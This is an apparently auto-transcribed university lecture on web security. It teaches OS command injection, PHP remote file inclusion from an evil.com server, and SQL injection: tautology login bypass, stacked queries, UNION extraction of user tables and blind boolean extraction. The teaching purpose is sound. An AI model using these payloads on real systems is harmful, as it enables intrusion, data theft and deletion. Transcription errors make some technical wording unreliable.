 All right, folks We got three meetings Yeah, it's crazy Think of all those things you learn you knew nothing when you came in Disparate your knowledge coming into the sports You crafted us out of the clay Yeah, I mean molding young minds is what I do Okay Just wanted to ask about the final What is it going to be do you want a final exam? For an hour 15 minutes More difficult questions that I come up with to probe your knowledge of everything in my Ruins, but last Those are 12 weeks No one wants to admit in front of a bunch of people yelling no Extra credit Extra credit That's a good good tracking, you know, you never you got a Yeah, here's what I'm thinking we will do You can call it maybe we'll have so we aren't since we're running several cts throughout the year Right, so the cts plus your project report will comprise your project grade and then Your team's effort so your team will get a grade for the final so the final ctf will be in lube of a written final How does that sound And the project report is one per team or is it yes project report is one of her team So it's also That makes sense Can I repeat that yes, so your prop your project grade so you have a project report give a project to you Correct. Yes. Yes. Yes Yes, so you also have done three in class capture the flags, which we're all leading up to the project So all of that will comprise your project The final ctf that we're having on the 30th On the 30th That will count as your final so basically lube of a written final you take a ctf final as a team Fold it over for the two hours. I think it's an hour or two hour We'll be super well prepared for because you've done three in class cts And you have a lot of awesome tools to help you win the final ctf It's on the left side by that day, I think it's two days after the final the second Okay, it's a good plan How long will the final ctf be online for That's a good question. How long we needed to extend the other cts, right? Yeah, I think we can put it online until the project deadline. How about that? We'll announce the winner at the end of the My old ctf at the end of the minute But So our Is there gonna be another 47? No, no, no more It's not enough time. Otherwise that Contrary to your opinions. I don't you completely So we got we got the Hey folks So we got the yeah, we got an email with the willow mark so far. Yes. Um, can you tell us what the breakdown is and how that contributes to like And so okay, how does the 50% assignments? How does that split those three assignments 50%? Yes, and the ctf's go under the project? Yes, okay All right, let's get to it. Yeah, three more web security classes so I can train you to excellent web security actors Okay Okay Do you have any questions if you know where to email? All right, so switching gears Can somebody give me an example of where mixing coded data in the same channel Causes a security warranty Forms, what does that mean? JavaScript running Uh You said executable stacks, right? Yeah, the stack is executable, right? So you literally are storing the user's data in the same on the same channel literally the same Continuous memory that you also store pointers of where you go and execute things Right, so the fact that you have user data intermixed with essentially your control flow Means that a user think about if you completely prevent Any type of stack overflow nonsense If there was a completely separate user data stack and a completely separate Uh, basically gip stack and never the two could ever mix like our Like what? Yes Yes, so when you look at the von Neumann architecture versus the Harvard architecture exactly So that was the other one of the original styles of hiding the sign of cbu and the von Neumann architecture went out And so now we have to deal with this problem forever And as we'll see almost every single example A lot of web security vulnerabilities are framed and you think about that in this idea But this should be a general idea that you can take to any new thing where literally, uh For instance, let's say you're talking to a web service that's generating json output Right or json. So your user input is used to create a json response Right in that case the data would be the data contained inside each element of the json entry But if you can break out of that and add or change or manipulate the json from your input you could potentially change and compromise the security of the application so The first thing we're going to look at is our old friend. Otherwise the command injection attacks. So what were command injection attacks in the look at finance? No, there's no practicing yet. What's that? Now that there's no finding Yeah, it's just all notes of the way I'll decide at the end of class Was this like where we were able to utilize uh Sound like we'll use restricted characters to chain together Commands in a way that the wasn't initially Intended for by the program. Yeah, so what's like a vulnerable function at CW look at? System system or reopen Right. The idea is the problem there is you pass a string into system Which then bnsh would parse and interpret that as some Essentially shell command but And so similar to here the same thing happens in a web application where you can kind of strings together and pass it to literally sometimes the same functions like system So the idea is you have either completely no validation or incorrect validation So system in the web though now you have a different kind of context. We have eval. So let's eval do Yeah, it takes a string not just executes it right takes a string The run sign language interprets it. That's whatever language. So let's talk php. So it takes a string Parses it as if it's php code creates an abstract syntax tree and then starts executing it as if that code was in there always And questions on what execution environment it has when variables and what scope it has are language dependent But in essence, it's turning a string into code. So if you can control The code that goes to eval You could then inject any arbitrary. Let's say php code Which means you can read any file do anything that the php code could do the same as our robot code execution Similarly, you can include is um, could be another one or require We're gonna look at that though, but let's look at the example. So the idea be some either cgi program or php application that wants to let's say Let's say you write an application and you have a list of bad passwords that can't be used like a dictionary or something You want to make sure that their password is not in the dictionary? And you want to follow the privilege of not reinventing or privilege the principle of not reinventing the wheel So you use the correct command. You're not just great at looking through files for Uh, other characters. So you do something like grep This dog side exp is going to be the expression and then when I have a phone book, this would be a phone book application So you've seen our example of this in the ctf 3 and in the homework assignment In homework assignment degree where by putting back takes in there or by doing the slash bin essays the cat thing That we're looking at You can get a shell there Here's one case where it's kind of cool. You're using the mail command. So here you're emailing a file to yourself So the etc password file and then removing the phone book dot txt because you're super mean So the way to think about well, you fix this is easy just like on the command line You put double quotes around strengths and around arguments on the This will help because now the previous one would break if there's any spaces Right, it wouldn't be grepping for the great thing So is this safe? We're secure now No, why not? Yeah, because now all we need is a double quote to end the original double quote And then what do we need how do I call it and then whatever we want whenever our payload is And then what? Yeah, we need to somehow deal with this ending double quote because no matter what we put in Right, and this is where it comes from literally the way to think about this is the runtime is concatenating strings together Right this grep space double quote is being concatenated with whatever our expression is Which is always With a double quote space phone book dot txt So you need to have whatever you said be able to be parsed by bash Or bin sh because otherwise it's not going to execute So if you have a training double quote bash, you're going to say hey, there's a syntax error. It's not a valid command So you can be able to handle that so you can handle that by I guess actually this one doesn't and so that's bad. So that would not actually work So in the case of a different line because let's say PHP here depending on the implementation of system you may be able to pass in multiple arguments here So this in this case this would be similar to using the exact pp where you explicitly say I have this is one two three four. I have four arguments in the program So rb is only going to be four It's going to execute grep. It's going to pass e and then no matter what you pass them an exp Right, essentially you can think of it as this is parsing that string Right, we're not using spaces now to separate the arguments and telling bash or bin sh to parse that for us What we're doing is we are Pre parsing it and basically telling the system call or this call to the system function that these are the four arguments I'm going to use And I'm never going to use any more arguments. So it's not possible to create new arguments. Don't do any parsing so This is actually very tricky to get right because you need to be very precise about what routine you use So for instance If you leave this escape shell argument It says add single quotes around a string and quotes escapes any existing single quotes Allow one to pass a string directly to a shell function And having to be treated as a single safe argument So this means it's doing so if you put that within double quotes You may be messing things up because you're essentially double coding it and then adding single quotes inside of it Whereas escape shell command escapes any characters in a string that might use to trick a shelf man And the executing arbitrary commands and that lists all the different strings Are escaped only if they are not away at this one Take and double quote our single quote double quote our state only if they're not there So we as attackers So when we think about what's our goal with attacking a website So what does an OS command injection give us the ability to do? On the server, can we access every bit of data on the server? What do we limit it to access? Yeah, the context of the user the web server which in most distros it's going to be like the dash data Right, so whatever that user can see but if we start from the thing where we have no access to any files on the system We're completely remote attackers That now gives us additional access for now we are local attackers and we can do the other types of tricks We talked about like set by d attacks cool. So our goal is essentially to and we can read things But we also execute many arbitrary commands, right? We're not just limiting to read files where we can literally Do anything we want So as we saw in php when we look at php php has a nice way for you to break up your functionality into different files Just like when you're writing c you use include or when you're using java you can include some other class Right, which allows you to separate the function out into different modules and include what you need to get the java so many languages have this but The difference is especially with in terms of c Or even java when is that inclusion done? See where java too many javas start like this Yeah Right, but when does it include that does it include it when you When you compile it right to compile it it needs and see it in the headers and javas Places or any jars that you're using So when you compile it it needs to know all that information Depending on how you compile it as we saw maybe we'll dynamically load it But it doesn't need to go find random c files and include them This is in start contracts to a language like php where the inclusion is done at runtime So while the php coding while the php interpreters executing each line when it gets to a line This has to include this string or variable It evaluates that to a string and tries to find that file to parse that file as php code So what does this mean that we can do as attackers if we control the php code or if we can control sorry that string The included string You just volunteer yourself for that Yeah, we can maybe try to point it to a file that we uploaded or Maybe we can point it to a none I mean depending so what does php do when it interprets a file that is not have php tags It prints it it just prints it so we can get it to include easyc password That will just show us the easyc password file or any other file that we have access to and so And so not only could we maybe upload code into some file and in this case It doesn't even need to end with the dot php extension Because the php interpreter doesn't care at that point because you're telling it explicitly to include this file We can upload some code somewhere on the same system as long as the Data user can access it then now we've ran Custom code are choosing on the remote server We can also if as we saw php has that facility that you can do remote file include Include an hdp colon slash slash file Or you can include Sometimes an f2p file all kinds of weird Literally you start digging around in this this is super weird of all the things you can include And you may be able to try to influence or change the path So this is the the directive or the configuration option allow url f open And so yeah, let's say this is our main app dot php. It has a variable called include path slash includes It's going to include include path dot library dot php And then in library dot php. It uses the variable include path to include math dot php And so now here we're changing kind of two behaviors here, so we're using The registered locals or assuming the code is using registered locals and this is yet another instance where registered locals is terrible because The way file included is done in php. It's essentially Copy that file and paste it in right there including the scope and everything So this means a file that you include for instance here gets access to all the variables that are Defined at that point, which means it's very useful in this other include path This library dot php to use a variable that was defined before you called it Yes, so could you include your own php and then overwrite the variable to as well to like re re Overwrite the global variable And then yes, you could definitely do that but at that point once you get next to php code it's game over They're about all the variables like You could write a shell out you can Do all kinds of fun stuff There's php shells, so if you want to get Into this you can get php shells So let's say we have this example here. We're we're calling library dot php. We're saying to include path We know they have registered locals. What file is going to be included? By the room by the remote? Yes, hdp colon slash slash www.people.com slash math dot php. Why math dot php? Yes, always getting offended Right, so this means if we point this to a domain we control Create a file there that's math dot php And we have to be careful to not interpret that php code because we want to ship a source php file Right not be not the result of executing that php code If we include that there then that would be included at runtime and executed on that system questions on this You can also briefly mention it I Don't know if they've changed this behavior in newer versions of php But you used to be able to to deal with Appending the things that got offended if you made a request and then if this was the URL you wanted And you did percent zero zero again What does that become what's percent zero zero if you are decoded as? As a null byte Then php includes just fine and then append dot math dot php So you have hdp called slash www.people.com null byte math dot php And then when php takes that and sends that to system like sys calls Right to f open this or url yet. What is the underlying? runtime language of php use? Like what does this call what do sys calls use when you pass like a In the operating system I mean generally system calls like when you call into the operating system what How do you pass values into a system call like read or write or open? What is that? Yeah, but what's the data thing? A character pointer a c null terminated string So that you pass that data in there and it includes a null byte Then that system call will completely ignore anything after that and will only execute up to that I think in like the very latest versions I see that php they'll be thinking to text this behavior. Do you remember that? Yeah, but it's still definitely still happens. And so it's a nice way of vague and get around especially older versions of php Cool, okay Yes, you said mass of php has to be like the the faint math of php has to be done in such a way that it's run by this So think about exactly what's happening. So we have so there's three players here. There's us Or are the system that's making the requests. There's the server that's vulnerable and then there's our evil.com server So we make the request this request we saw here This back end server is going to process that request. It's going to do the include it's going to try to include evil.com slash math dot php Which means it's going to make an hdp request at evil.com slash math dot php And whatever gets back in the hdp body of that request it will interpret as php though So you you need to send it back something with php commands With open tag and close tags, but you throw that on a server that's executing php files Those will not be output unless you do it in a weird way What is evil.com by default Outputs math dot php Like what? By default without even just evil.com slash will give math dot php output without even happening that If we control the files of evil.com Yeah, we can pull the files for the root we can tell it like Do this like output this so yeah, we actually need to be careful. We actually don't even need for something like this. We don't even need to We wouldn't need to run a whole web server. We can just run this up So we can change the port to make you go to any port and we can run like nettap To output whatever we want so we can output the start of an hdp response With the body of whatever we want and that will be interpreted. All right. Let's go to the next example So we talked about that web applications very frequently use the data use a database. Why do they do that? Exactly there's no remember with a web application Any user can make any hdp request at any time Right and this means you can have multiple concurrent requests So if you just use files you have to use file locking so you can have only one person accessing a file necessarily at a time Or you'd be completely destroying the throughput of your application because every request would have to lock whatever file you're using Use it and then the next one would spin until they got access Databases are designed to solve these types of concurrency problems And how do web applications like we saw how do they query the database? Right. I mean, I don't connect but how does the code of the web application inquiries to the database? so Yes, so by SQL queries, right? So there's a Structured query language, right? SQL structured query language That is defined which is how people and also web applications query data from the SQL database So fundamentally for the web application to get or put any data into the web into the database It needs to issue SQL queries As we've seen and again What often ends up happening is web developers will issue SQL queries by concatenating strings together So they'll have the first part select star from users Where username is equal to dollar so username and password is equal to dog type password So let's envision that we have this beautiful web page with a username and password anybody see a login page before Anybody see a login page on internet explorer 6? That's me recently. I mean besides the one you're looking at right here. I hope not recently that'd be Parable one of these web developers that has to develop sites that still work in IE 6, but Do they still do that? Does anyone have that as part of their job description? I would imagine and also you guys think a lot of corporations they developed They bought some big whatever time sheet management software And the early 2000s and it only runs on IE 6 It's using features of IE 6. So that's why they still have copies of this thing around so people can use that It's actually cheaper for them than rewriting the whole application and fixing it to just force the employees to use a Let's just call it a super old web browser Cool, okay, so when we dig in so Always always always we're looking at web applications We gotta dig in and look at the source and the source in this space means the html of the page So we want to look at the html source here and say, okay, there's a form with an action of login.asp Methodist post again, you can turn this Submitting this form into an htp request Because we're super old school we're gonna use tables to do the layout rather than css So we have a table and the things we care about our input field So we have input type text name username and input of type password name password And a submit button or a reset button pretty standard So if we look at the login script, so I noted brief cover asp is very similar to asp This is one of the things you're dealing with the lab. You never know Because you never know what the backend web server code is written in So you may have to deal with things that are written in Node.js or which is javascript or ruby or python or asp.net or Java Python Go I haven't actually I'm sure it happens. I think Go is used in a lot of backend services. I don't know about who had that C++ Lua, yeah lots of stuff Lisp Anyways, I could go on Lisp is awesome Reddit was the first version of Reddit was written in lisp before they rewrote it Python Yes Okay, so The backend code is very much what you'd expect for a logging function. So what would you expect a logging function to do? Get the username and password from the request and do what with it? Compare names and database check is there a user with this username and password You should take other security classes to learn how to actually implement this with hashing and salt and all that We'll let you go with that for now So we get the username and password from the request Super easy this you can think of these are helper methods that are parsing it from the url and the htp request right So we don't need to go into the details here It's then Creating essentially a connection to a database. So we know there's going to be some database connection It's then creating the query right again. This is what needs to happen It needs to make a query to the database And it selects from pubs dot guests dot s a table where username is equal to username and password equals to password Right, this is what we want to check. We want to say it doesn't user exist in our database that hasn't been given the username and password And then we make the query on the database and then what do we do after that? How do we know if the user is a valid username and password? If the what what do we check on the return? Well, it's going to give you Because this is going to be a boolean check, right? So it's going to give you the full results So this is going to be this is going to give you every user in that table So every row in that table that matches the squaring range That has the username of what I gave you and the password of what I gave you So it's not a boolean Yes, although logging may be we want we may want a boolean from logging, right? Depending on how you run that but we need to figure out whether the authentication was true or false depending And so essentially they're using The count basically how many rows are returned if there's no row if there are no rows returned Then there does not exist a user in the database with the use given username and the given password And say access denied otherwise say that access is granted and do other stuff Set cookies and associate the cookie with a session and all All that The key problem here Is that this sequel query is being constructed by concatenating shrinks And here it's very clear that training concatenation is occurring, right? It's literally It's not using anything tricky like PAP with Dollar sign food embedded into some string or it's doing a string interpretation which Connor loves So we can look at the database. There's some users in here and so If we're an attacker And we want to get into this Log into this lead application without knowing a user. So we already know username and password Do we care? No, maybe not. We can already get in Right What do we don't know username and password? Just what? Just ask for one Ask for one? Yeah Ask where you use a sequel query to get the username Yeah, we'll get there I thought you meant to ask like Bob for this password Which is basically phishing so yes that works So, okay, so let's work backwards. Where are we trying to get where are we trying to essentially force the execution to go in this login strip? What's that? It's going to be That the else condition of access granted so work backwards. So what has to be true in order for us to get there? Yeah, there needs to be we need this rso.eos to be false Which means we need there to be rows returned So there's one way we can do that, right? We can put in the username and password that we know and that row will be returned Do we know what username and password? No, we do not but Our input from username and password actually let's draw a picture here We haven't drawn it. I haven't drawn in a long time at least in this class. It's so nice Okay, I know you've all missed it. So we have let's go text here Paste yes So Let's think of it and again it all comes down to parsing just like with the system and the p open calls So what's going to happen? We're going to select star from blah. I'm not gonna write that where username Is equal to and then single quote and then something that we put single quote and password Is equal to single quote Again the second thing to wrote single quote right so Whatever we put for username will be substituted in the first single quotes wherever we substitute as the second as the password we put into the second quotes and then what happens When our web application takes these bytes and sends it to the sql server What is that it will expand the the literal into and in sql query That's what you're asking be more specific So what is it? So what is so what is the sql server yet from us the web application? No, it does not get a sql query it gets bytes It gets the byte for s the byte for e the byte for l the byte for e the byte for c t space blah blah blah blah Maybe until the new line. I actually don't know the exact sql query syntax or sorry data transfer syntax on these sockets, but Essentially it's transmitting this as a Essentially as a bite and then what does the sql server have to do? It has to parse it right it has to parse those bytes and say is this a sql query and then if so what are the semantics of that sql query so From the parsing it builds a parse tree and says ah these are the sql keywords It's a select query. It's querying on this table And it has it has this wear clause of this username and this password So what our goal is here is can we give input? to Because we can are there any restrictions that we saw that we could put a free username and password It has to be string literal right so What is that meaning that the enclosed sql query is going to have Encapsulating the guy has to be it's it's sort of been Ah, so these yes the question is this username variable comes from request.form username So there's no checks on the server site code that says There's no spaces Or that there's only alphanumeric characters, right? So basically anything we give for the username parameter will be input here great So now So now we can put anything in for this username right So what if we just put like foo space bar? And again remember it all comes down to the sql server parsing this We will take this parse this thing. Ah, this is a select query of all columns from this table and it has these clauses Right and foo bar is just a username equals foo bar So the goal is can we actually change the syntax of this query? By giving a different input So how could we do that? I would do Do it and Single quote single quote and then or username equal star Isn't that like return? I don't think you have to enclose and single quotes, right? Let's just keep going. Okay, so we're putting in our input here star space or right or username equal star Because I think the query you don't do single quotes around like asterisks, right? Let's think depends on the sql engine. Let's let's say this well, we'll figure it out Okay, otherwise I would just do star instead of four usernames So, you know what I mean? Okay. Yes. Okay. So this so just to be 100 clear this is our input, right? Right, and then you have to like or like username The we want more input. I'm just saying to enclose the the second That's okay. Yeah, that's good. So let's stop for a minute. So let's say we didn't take or username equal star We'll put foo bar in for password When the sql server gets this sequence of bytes, what's it? What are they going to do? It's going to do what? More specific. Yeah more specific. What kind of an error? A syntax error. Yes, exactly. It's going to say this is not a valid syntax because You have a single quote here a single quote here a single quote here. So you have a non-matching single quote Can we just get why can't we just get rid of all of this garbage? Because it's part of the string. Because it's part of this. It's not just part of the string It's part of the code that executes every single time this script executes Right, if I can catnip strings together no matter what we give there will always be This single quote space and password equals space single quote So we can't just get rid of it as much as we would like to So how can we handle this part? I just did the or because I wasn't sure like are you do Asterisk you can do another or and then or username equal like username equal another single quote. Just repeat the first where Or I guess we could be So that'll match with this. Yeah, and then it'll be equivalent to the other. So now we have username is equal to empty string which would probably never match Or username is equal to star Match everything or username is equal to single quote and password equals to something So there's a little bit of things here. We're not 100 sure about how that and the orders will parse But it's equal engine whether it's left most or right most or I don't know It's a little bit risky because we have this additional and password Boss here So it's good. So the idea here is username equal star should match everything We can also basically essentially write the Totology here or one equals one which will match for every single Right, so it's is SQL just for web applications What's it also for? Humans Actually the goal of SQL and why it looks like this is because the goal was for humans to write queries So I think it was business people could write queries to query the database Look at how well that's turned out Which means if you have SQL, which is essentially language that was meant for humans What do we know from cross code that you've wrote? Do you have no idea what it does? Okay, even you yourself wrote Go back three years and look at some code you wrote in class So what's what's one technique you have to try to combat that? What else commenting right You write comments that say what the code should do or what the purpose of this code is right Sometimes I'm doing something like I don't even know why this is you can hear like what this is Functioning is supposed to do Right, so say I'm going to a sequel would be often if you wrote some query down It would be nice to have a comment that says what it should do right and unlike in So some SQL engines and this is where I become tricky some SQL engines use double slashes to go from here to the end of life as a comment and some do dash dash And that is an end-to-line comment And so rather than worry about this or username equals tick and to match up with this pick Exactly. Let's just comment it out And then we don't even care what's after us at all right and again, this is because When the SQL server gets these sequence of bytes It parses it as a SQL query. And so it says oh a comment ignore everything after Focus on everything before So now we print the query that will parse select star from this table where username is equal to empty string, which will be nothing or one equals one This will return every row of the database Which will then get us past this end of file check Cool. And this is the tick or one equals one dash dash technique It's kind of a mouthful, but this is the standard Like baby's first SQL injection So let's see if there's anything interesting here Yes, okay, perfect. And it's all about parsing right so here I've styled such that the SQL Keywords aren't bold and everything in comments after the comment is gray. So it doesn't matter what we have after that cool And that's the basic idea. So the big yes Every single row in that table So which if they were checking if the number of rows returned is equal to one would not work And that's why this is no You have to tailor it to what the application is and what that source code is checking from So in that case, maybe if you knew there was a username of admin you knew somebody's username You can do admin tick for n one equals one And that would match the username who had admin And only return that one row And this is really the core part of this technique But the core part of this technique is not the take four one the one back back The key is altering the syntax of a SQL query issued by the database and this tiny Which honestly doesn't seem like much. I mean, yes, it's nice here. You can bypass login You can maybe return all the rest or whatever But it's insane like even just a bit one thing you can Um Oftentimes you can read you can download the entire database so you can get the entire database you can Often the depending and that's pretty much all of them depending on how you may be able to inject additional data to the database and you're able to update different rows in the database All kinds of super crazy cool stuff so And it depends and again it depends on what because okay When you think about this so using the dash dash to comment That affects what part of the SQL query that the web application is building after our injection point right where our user input is being used Can you change what happened came before? No fundamentally, there's no possible way because it's concatenating strains You can't change the bytes that that are repended to your input You can only change the things that come afterwards So it's why you can't just change this selecting to something else magically But you can have injections and to select which does cool stuff If we talked about you can have an injection into an insert statement where you can inject multiple entries you can have An update statement where you could update So here we'll be updating the password field of a certain user But again if you're updating the password and you set the password to be some pat like Fubar tick dash dash now you change every user's password in the database to fubar Which is just saying things knowing everybody's password, right? Which I think was like this class or less I actually did that. I think it's last semester for four sixty five I updated the database. I was doing it manually because somebody forgot their password And I ended up changing everybody's password The left is the end of the semester already, so nobody I think knew about it But it's like, oh, that's not good Maybe it was this class I don't think anybody's had this class Let me check my password now You've probably forgotten. Everyone forgot All right, and then in delete statement So here we can do the same thing and delete all of the accounts Right by altering this where clause So these are so you can think about They can steal your data change your data or delete your data completely with a sql injection So sql injection in terms of like severity of types of vulnerabilities sql injection is one of the most severe and critical vulnerabilities that can exist in an application In a web app So yes, I guess it would go remote code execution on the top because from there you can access the database Frequently and then sql injection and then we'll see cross-experiment with other stuff Mixed in Cool, so Other things we can do depending and this depends on the back end database engine So what's this sql syntax for Separating different queries and that's part of the sql you can actually go look this up You can look up the syntax of the sql language. I literally do this all the time And like cts when I'm doing some kind of web Attack and I think it may be a sql injection and so I have to go look up. Okay. I know it's postgres So I'm going to look up the exact syntax of what postgres does so I can take advantage of the syntax And so the query separator is semicolon. So if you can use semicolon, you can inject Multiple queries so you could not just do selection you insert updates any query command So this is if the server allows it. So it's dependent on the server and the web application Sometimes the web app will add Like change the configuration to allow this So in this example, so we have our select star from the essay table the user table or username And then we have semicolon Insert into essay table user password values add them text So now I've basically now again, it's all about parsing the sql servers. They get this whole string including the southern gray Parse it and it recognizes the semicolons that supports multi-stated queries Then it will execute both queries Which is fairly I mean pretty powerful, right? Cool. Okay. The question is how do we identify these? So what do you think how would we go about looking for sql interactions? Particularly in a black box manner where we don't have access to the source code So we don't know what the sql fields are right? So that's the biggest problem. So we'd have to like look at traffic to What tracks like sql queries from other Users ah the queries come from the web application to the database, right? So yeah, usually it'll be running locally. If not, there'll be in some data center Where we likely do not control But yes, that's the the core problem is Yes, we can if we go back to another example, we can insert into this table But we need to know the columns of user and password with the values of having tasks No, uh, any of these any keys From row keys, you can go ahead and look don't worry Do you want to learn about sql injections? These are mine. Okay. I don't see them up here Okay, um So we need to know the columns in order to insert new columns or we need to know that In this case, we need to know the column named user and the column named password And so we need to somehow identify those what else but that's more about When we know there's a sql injection, how do you take that to actually exploit things, right? So there's different stages, right? There's identifying does a sql injection vulnerability exist And then there's the exploitation of that vulnerability Similarly in binaries Right a buffer overflow. You can detect it one lightly exists by getting input of size 10,000 If the crash of the app that means there's likely some kind of Buffer overflow or something that is going on But that doesn't mean you know how to exploit it, right? Some of you have Struggled with those phases right going from identifying the vulnerability to exploiting the vulnerability Is definitely Takes different skills and requires different things, but it's equally important So what else so what are some ideas? You can test the sql injection What's that? You'd like the sql injection Ah, that's all right. We're trying to find them. But how do we find them? How do you know them? You can look at the spaces How do we look? Because we don't have the source code, right? So we don't know So again, all we have is that form. So if we go back to our original page, all we have is the html form And we don't see The code at all and we don't see any queries that the database issues You can try using query separators and executing your queries and seeing what happens Yeah, we can try so one thing we can use is we know or What we've talked about the sql server will likely return a syntax error if there's invalid syntax So we're going to use the blacklist idea and basically put characters that would be on a blacklist single quotes, double quotes, semi-holens parentheses And see what happens and see if we can cause it to crash because if the application is well Formed it should not crash based on that input, right? It should tell us that that thing doesn't exist Is that the only way to test? How would we influence the time as we show the work? Through the sql injection So basically we're trying to identify single ejections first. So how do we do that? Okay, basic way is to use a syntax error and in that syntax error, also the five If we return to some parts of the query, so we can guess what actually happened before that query is to Tell the animation yes Yeah, so So we can do so kind of a little academic way of thinking this is kind of two ways of a negative approach and Which case you're trying to cause some error to occur either 500 or Sometimes you'll see a literal sql like my sql error message depending on how the applications go So in this case, like what if you put user equals tip or double quote, right? What happens is that does the query fail Another cool way to think about this and this actually happens a lot is to Use like a positive approach so give input that shouldn't mean anything. So let's say if you look at a lot of blogs they'll be when you go to the blog post they'll be like a blog Whatever blog id equals five Right, that's the id there and so presumably there's some sql query that says select star from log where id equals five when you pass it so what if you do and the interesting thing about sql goes back to syntax is often times So there's functions like you can add two numbers in your sql query so you can look for Blog id equals five you can also do select star where blog id is equal to two plus three Which should return the exact same page? Which doesn't make sense if it's not a sql engine executing that string So if you pass two so here in this case 17 plus five if that returns the entry for 22 Then that's likely a sql injection So you're not looking for an error. You're looking for a success in this case Which is I think an interesting way to think about it Cool. Okay, and then we have to go into crazy sql syntax Of how powerful a sql injection vulnerability is so we looked at a select statement So I kind of made a bold claim earlier where I said we can using Any sql injection or let's show this slightly and say any sql injection that starts the select statement Without using multiple queries, we can download the entire database But if I look at the sql query and the third bullet in there It's select star from accounts. How could I ever get any data out of there besides what's in the accounts table? It seems like not right because it seems like that sql query scopes to the accounts table because I just Try to drill to your head. You cannot change the stuff that happens before We can't change that into a select star from Users where we want the user information. We want their credit card information So it goes back to the union operator So the union operator allows us to merge the results from two queries So we can say select star from users where foobar union select star from Other table and all of those results. We return in one big query So for instance, this is a terrible example, but um I don't know why they repeat um So here we're essentially unioning the results of these two queries. Okay, thank you so The idea is we can use this to extract more information from the database. So for instance So here we have select id name price from product where brand is equal to some brand Right, so we know that the result set is going to return how many columns three columns, right? id name and price Which means that we can do a union on another table Okay, so let's look at this. Uh, let's go Coming back here And it should be this more often So I have id name price. So I already know That the resulting table is going to be id name And price So the first elements that are going to be returned will be the results of whatever this query is If we then change brand to be foo tick space union So quite union select Let's say star Users that I really want. I actually don't care about the products. I can crawl the website and get all the products right from users And I probably don't want to wear blah blah blah blah And I'll do dash dash to get rid of everything and they're good So now the query becomes select id name price from products where brand is able to Be able to foo union select star from users This will not work. Why won't this not work? What was that? No, because the queries are distinct so we have two different queries here select queries. We have this select query Select whatever this and then we have this select query So I guess the first thing to say are each of these valid queries It's intactively valid Yes What is the you can think of how many columns are returned in the first query? How many columns are returned in the second query? We don't know. What's the user table look like? Well, let's say a user table has Uh id name Or you like you name money Social security numbers credit card number Right, so let's say it has when we do 456 it has six columns so Actually, I don't know if I'm going to say something wrong, but that's okay So it should give us an error because it can't union these two tables together because one table has three columns and the other table has seven columns So it fundamentally cannot do that So how do we change our query to fix that problem Yeah, exactly. So change so starman return every column from users. I know I want three Could we do id plus one? id and then one So we know that we already are getting the columns one two and three. Yeah, could we get columns for 456? Just to try whether It catches the next columns Interesting. Okay. So the one thing is actually the names don't matter the name is going to be used of whatever is in the first column based on the semantics of union So basically these results will be essentially appended in there So the code that loops over it doesn't know that it came from this other table. It still thinks like it came from this Whatever it just knows that the return column is named id name price. So the name is going to be different But we want let's say id user name and maybe pass That could be nice Right. So now This table will say, okay product one is named evas and the price is 10 and product two is Oh, our brand is foo. Okay, so foo What would fruit brand have? Let's say a bar in evas. That makes sense And evas is much more expensive And then it's going to union the id name and password from all of the users in the user table So this will be id probably one again because there's probably a user of id one The name will probably be an admin and the password will probably be an admin And two the next person bob signed up for a thing He has a very terrible password which is a password and so on and so forth and when The resulting code The php code loops over these records. What is it going to likely do for everything that's returned? But where did this query? I mean imagine some web application showing you all of the Products that are from a certain brand, right? So what does it need? It needs the id to show you where to go? It needs the Name to show you what the name of the product is it needs the price to show you the price But again, these are just strings that are being returned. It's iterated over this loop So it's going to create a product with an id one a name of admin and a price of admin The same as an id two a name of bobbin and a price of password And we'll do that for every single user in our table because it just loops over all of the return results So by doing this now we can extract information from other tables, but we had to know Some important pieces of information. What do we need to know? So we need to know the column names. We need to know the id the username and the pass What else do we need to know? The table name you need to know there's a table name users. That's probably a good guess, but we need to know that What else do we need to know? We needed to know the number of columns in the original query Right and possibly the type of the column depending on the database Yeah, this could fail because price could be an int column And so you would say that you can't do that union and it wouldn't fail But we can work around actually 100% all of those issues so cool, so one thing yeah, okay, so One thing we can do is we can return the we can use the fact that when we give a union If the number of columns do not match Then it will return a syntax error like a 500 error But if it does match then we're good, but we don't yet know what table we want So what we can do is we can do union select null and this will create essentially a row of with one column Who's typed as null which could be anything And so this will succeed only if the original query had only one column And we can just keep doing this and make iterative approaches Keep going no, no, no, we get to here and it would say yes This query succeeded and we would see an extra product with name with IE null name null and password and price null Which would be cool and say we're on the right track Now we we can actually figure out the type of each column first By doing the same thing and putting in a hard coded string for each of the nulls And if that succeeds, we know the first column is a string If that succeeds, we know the second column is a string if that succeeds Then we know the third column is stringing. It's not a string that we tried integers We tried Boolean. We tried all the data types of the sequel query And they're down in a completely black box manner without knowing anything about the original part of our query We're able to know how many columns there were and what the type of each column was But we still need to know the names of the table and possible column names Which is tricky So there's no standard way to do this in sequel. There's no standard Just give me the table names that you have But every specific database engine has a way to query What are the tables? What are all the tables in this database? And then for every table, what are the columns in this table? And so from that you extract information about every table in the database Then you may extract information about every column and there you start sucking down all the information from all of the columns So Oracle has a user objects table. Really, you just look this up is the way MS sequel has this my sequel is in information underscore schema dot tables You can extract all the table names and information schema dot columns table You can extract all the columns here and these are standard. So for each of these tables, it is fixed What the column names are and how to query that table for that information So using these two techniques, you can extract all of the information here But we have to extract this information. How what was the application doing in order for us to get that username password it was querying the database and then returning to us in the html result the data from the database But does the login return us the results of the login? No, all it does is log us in right it's a query that we don't see the output of And this frequently happens where there'll be multiple queries where you don't directly see the output of And so but Even without that so even without the ability to get the output a sequel injection vulnerability allows you to completely pull down the Database and so the idea here is if you can't these are called blind sequel injections and you cannot see the resulting response from the data return and usually So what you will get you do get one bit of information You get either well, you know a 500 error if there's an error and So that's one bit of information. So that's what tells you if there's a sequel injection vulnerability You'll get some 500 But even if you get no response back on an error message or anything you can still do that. So imagine a Web a web application that has a press release. So this is just like the blog that has some id The sequel query is select title description for press releases where id is equal to five And all the error messages are filtered So Okay, cool. So the idea is we use this idea of and one equals one So id five and one equals one should return what? It should return the page five just the same result as accessing id equals five Right, so this should be exactly the same So the idea is we know one equals one is already true and we can ask boolean queries of the database engine Using that to extract data bit by bit from the sequel server for every query Allowing us to extract all of the data from the database. It is super cool. So We could do something like we could ask a query like is the current user's name hacker Right, we could say five and username equals hacker So if that is true, we know we will get the page with five if it's false We will get an error page that says that there's no id There's no page for that thing So that tells us one bit of information But that's not really enough, but what we can do is we can actually do By bite by bite searches on values that we want and use a What's the thing I'm looking at? a Binary search. Yes, that's the term. Thank you. So we use a binary search so we can ask is We want id five and some string of username one one, which is going to give us the first Character of the username and we want to 